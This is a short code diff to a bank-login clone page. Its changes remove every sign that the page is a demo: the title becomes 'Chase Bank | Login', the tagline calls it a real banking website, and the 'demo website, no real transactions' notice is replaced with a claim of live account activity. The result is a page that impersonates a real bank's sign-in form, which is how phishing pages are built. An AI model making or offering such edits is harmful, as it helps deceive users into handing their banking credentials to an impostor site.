--- a/index.html
+++ b/index.html
@@ -3,14 +3,14 @@
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>Chase Clone | Login</title>
+  <title>Chase Bank | Login</title>
   <link rel="stylesheet" href="style.css">
 </head>
 <body>
 
   <div class="login-card">
-    <h1>CHASE</h1>
-    <p>Secure Banking Demo</p>
+    <h1>CHASE BANK</h1>
+    <p>Secure Banking Website</p>
 
     <form onsubmit="login(); return false;">
       <input type="text" id="username" placeholder="Username" required>
@@ -18,7 +18,7 @@
       <button type="submit">Sign In</button>
     </form>
 
-    <small>This is a demo website. No real transactions.</small>
+    <small>Balances and transactions reflect current account activity.</small>
   </div>
 
   <script src="script.js"></script>
